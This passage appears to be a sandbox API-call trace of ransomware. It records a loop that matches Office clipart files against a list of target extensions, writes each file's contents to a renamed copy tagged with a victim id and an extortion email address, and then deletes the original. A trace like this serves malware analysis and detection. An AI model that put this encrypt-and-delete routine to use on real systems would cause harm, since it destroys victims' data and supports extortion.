Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00419_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00419_.wmf")) returned 1 [0064.527] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 68 [0064.527] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 68 [0064.527] lstrlenW (lpString=".doc") returned 4 [0064.527] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.527] lstrlenW (lpString=".docx") returned 5 [0064.527] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.527] lstrlenW (lpString=".pdf") returned 4 [0064.527] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.527] lstrlenW (lpString=".xls") returned 4 [0064.527] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.527] lstrlenW (lpString=".xlsx") returned 5 [0064.527] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.527] lstrlenW (lpString=".ppt") returned 4 [0064.527] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.527] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 68 [0064.527] lstrlenW (lpString=".zip") returned 4 [0064.527] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.527] lstrlenW (lpString=".rar") returned 4 [0064.527] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.527] lstrlenW (lpString=".bz2") returned 4 [0064.527] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.527] lstrlenW (lpString=".7z") returned 3 [0064.527] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.527] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 68 [0064.527] lstrlenW (lpString=".dbf") returned 4 [0064.527] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.527] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 68 [0064.527] lstrlenW (lpString=".1cd") returned 4 [0064.528] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.528] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 68 [0064.528] lstrlenW (lpString=".jpg") returned 4 [0064.528] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.528] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.528] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.528] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00437_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00437_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0064.528] GetLastError () returned 0x0 [0064.528] ReadFile (in: hFile=0x350, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x78c, lpOverlapped=0x0) returned 1 [0065.080] WriteFile (in: hFile=0x368, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x790, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x790, lpOverlapped=0x0) returned 1 [0065.081] ReadFile (in: hFile=0x350, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0065.081] WriteFile (in: hFile=0x368, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0065.081] SetEndOfFile (hFile=0x368) returned 1 [0065.082] CloseHandle (hObject=0x368) returned 1 [0065.082] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.082] SetEndOfFile (hFile=0x350) returned 1 [0065.083] CloseHandle (hObject=0x350) returned 1 [0065.083] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00437_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.084] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00437_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00437_.wmf")) returned 1 [0065.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 68 [0065.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 68 [0065.084] lstrlenW (lpString=".doc") returned 4 [0065.084] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.084] lstrlenW (lpString=".docx") returned 5 [0065.084] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.084] lstrlenW (lpString=".pdf") returned 4 [0065.084] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.084] lstrlenW (lpString=".xls") returned 4 [0065.084] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.084] lstrlenW (lpString=".xlsx") returned 5 [0065.084] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.084] lstrlenW (lpString=".ppt") returned 4 [0065.084] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 68 [0065.084] lstrlenW (lpString=".zip") returned 4 [0065.085] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.085] lstrlenW (lpString=".rar") returned 4 [0065.085] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.085] lstrlenW (lpString=".bz2") returned 4 [0065.085] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.085] lstrlenW (lpString=".7z") returned 3 [0065.085] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 68 [0065.085] lstrlenW (lpString=".dbf") returned 4 [0065.085] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 68 [0065.085] lstrlenW (lpString=".1cd") returned 4 [0065.085] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 68 [0065.085] lstrlenW (lpString=".jpg") returned 4 [0065.085] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.086] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.086] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.086] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01168_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01168_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0065.086] GetLastError () returned 0x0 [0065.086] ReadFile (in: hFile=0x350, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x7d4, lpOverlapped=0x0) returned 1 [0065.143] WriteFile (in: hFile=0x368, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x7e0, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x7e0, lpOverlapped=0x0) returned 1 [0065.144] ReadFile (in: hFile=0x350, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0065.144] WriteFile (in: hFile=0x368, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0065.144] SetEndOfFile (hFile=0x368) returned 1 [0065.145] CloseHandle (hObject=0x368) returned 1 [0065.146] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.146] SetEndOfFile (hFile=0x350) returned 1 [0065.147] CloseHandle (hObject=0x350) returned 1 [0065.147] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01168_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.147] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01168_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01168_.wmf")) returned 1 [0065.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 68 [0065.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 68 [0065.148] lstrlenW (lpString=".doc") returned 4 [0065.148] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.148] lstrlenW (lpString=".docx") returned 5 [0065.148] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.148] lstrlenW (lpString=".pdf") returned 4 [0065.148] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.148] lstrlenW (lpString=".xls") returned 4 [0065.148] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.148] lstrlenW (lpString=".xlsx") returned 5 [0065.148] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.148] lstrlenW (lpString=".ppt") returned 4 [0065.148] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 68 [0065.148] lstrlenW (lpString=".zip") returned 4 [0065.148] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.148] lstrlenW (lpString=".rar") returned 4 [0065.148] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.148] lstrlenW (lpString=".bz2") returned 4 [0065.148] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.148] lstrlenW (lpString=".7z") returned 3 [0065.148] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 68 [0065.149] lstrlenW (lpString=".dbf") returned 4 [0065.149] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.149] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 68 [0065.149] lstrlenW (lpString=".1cd") returned 4 [0065.149] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.149] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 68 [0065.149] lstrlenW (lpString=".jpg") returned 4 [0065.149] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.149] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.149] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.149] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01170_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01170_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0065.150] GetLastError () returned 0x0 [0065.150] ReadFile (in: hFile=0x350, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x964, lpOverlapped=0x0) returned 1 [0065.159] WriteFile (in: hFile=0x368, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x970, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x970, lpOverlapped=0x0) returned 1 [0065.160] ReadFile (in: hFile=0x350, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0065.160] WriteFile (in: hFile=0x368, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0065.160] SetEndOfFile (hFile=0x368) returned 1 [0065.161] CloseHandle (hObject=0x368) returned 1 [0065.161] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.162] SetEndOfFile (hFile=0x350) returned 1 [0065.162] CloseHandle (hObject=0x350) returned 1 [0065.163] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01170_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.163] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01170_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01170_.wmf")) returned 1 [0065.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 68 [0065.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 68 [0065.163] lstrlenW (lpString=".doc") returned 4 [0065.164] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.164] lstrlenW (lpString=".docx") returned 5 [0065.164] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.164] lstrlenW (lpString=".pdf") returned 4 [0065.164] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.164] lstrlenW (lpString=".xls") returned 4 [0065.164] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.164] lstrlenW (lpString=".xlsx") returned 5 [0065.164] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.164] lstrlenW (lpString=".ppt") returned 4 [0065.164] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 68 [0065.164] lstrlenW (lpString=".zip") returned 4 [0065.164] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.164] lstrlenW (lpString=".rar") returned 4 [0065.164] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.164] lstrlenW (lpString=".bz2") returned 4 [0065.164] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.164] lstrlenW (lpString=".7z") returned 3 [0065.164] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 68 [0065.164] lstrlenW (lpString=".dbf") returned 4 [0065.164] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 68 [0065.164] lstrlenW (lpString=".1cd") returned 4 [0065.164] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 68 [0065.164] lstrlenW (lpString=".jpg") returned 4 [0065.164] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.165] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.165] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.165] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01172_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01172_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0065.166] GetLastError () returned 0x0 [0065.166] ReadFile (in: hFile=0x350, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x8b8, lpOverlapped=0x0) returned 1 [0065.180] WriteFile (in: hFile=0x368, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x8c0, lpOverlapped=0x0) returned 1 [0065.181] ReadFile (in: hFile=0x350, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0065.181] WriteFile (in: hFile=0x368, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0065.181] SetEndOfFile (hFile=0x368) returned 1 [0065.181] CloseHandle (hObject=0x368) returned 1 [0065.182] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.182] SetEndOfFile (hFile=0x350) returned 1 [0065.183] CloseHandle (hObject=0x350) returned 1 [0065.183] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01172_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.183] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01172_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01172_.wmf")) returned 1 [0065.184] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 68 [0065.184] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 68 [0065.184] lstrlenW (lpString=".doc") returned 4 [0065.184] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.184] lstrlenW (lpString=".docx") returned 5 [0065.184] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.184] lstrlenW (lpString=".pdf") returned 4 [0065.184] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.184] lstrlenW (lpString=".xls") returned 4 [0065.184] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.184] lstrlenW (lpString=".xlsx") returned 5 [0065.184] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.184] lstrlenW (lpString=".ppt") returned 4 [0065.184] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.184] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 68 [0065.184] lstrlenW (lpString=".zip") returned 4 [0065.184] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.184] lstrlenW (lpString=".rar") returned 4 [0065.184] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.184] lstrlenW (lpString=".bz2") returned 4 [0065.184] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.184] lstrlenW (lpString=".7z") returned 3 [0065.185] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.185] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 68 [0065.185] lstrlenW (lpString=".dbf") returned 4 [0065.185] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.185] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 68 [0065.185] lstrlenW (lpString=".1cd") returned 4 [0065.185] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.185] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 68 [0065.185] lstrlenW (lpString=".jpg") returned 4 [0065.185] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.185] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.185] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.186] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01176_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01176_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0065.186] GetLastError () returned 0x0 [0065.186] ReadFile (in: hFile=0x350, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x760, lpOverlapped=0x0) returned 1 [0065.195] WriteFile (in: hFile=0x368, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x770, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x770, lpOverlapped=0x0) returned 1 [0065.196] ReadFile (in: hFile=0x350, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0065.196] WriteFile (in: hFile=0x368, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0065.197] SetEndOfFile (hFile=0x368) returned 1 [0065.197] CloseHandle (hObject=0x368) returned 1 [0065.197] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.198] SetEndOfFile (hFile=0x350) returned 1 [0065.198] CloseHandle (hObject=0x350) returned 1 [0065.199] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01176_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.199] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01176_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01176_.wmf")) returned 1 [0065.200] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 68 [0065.200] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 68 [0065.200] lstrlenW (lpString=".doc") returned 4 [0065.200] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.200] lstrlenW (lpString=".docx") returned 5 [0065.200] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.200] lstrlenW (lpString=".pdf") returned 4 [0065.200] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.200] lstrlenW (lpString=".xls") returned 4 [0065.200] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.200] lstrlenW (lpString=".xlsx") returned 5 [0065.200] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.200] lstrlenW (lpString=".ppt") returned 4 [0065.200] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.200] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 68 [0065.200] lstrlenW (lpString=".zip") returned 4 [0065.200] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.200] lstrlenW (lpString=".rar") returned 4 [0065.200] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.200] lstrlenW (lpString=".bz2") returned 4 [0065.200] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.200] lstrlenW (lpString=".7z") returned 3 [0065.201] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.201] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 68 [0065.201] lstrlenW (lpString=".dbf") returned 4 [0065.201] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.201] 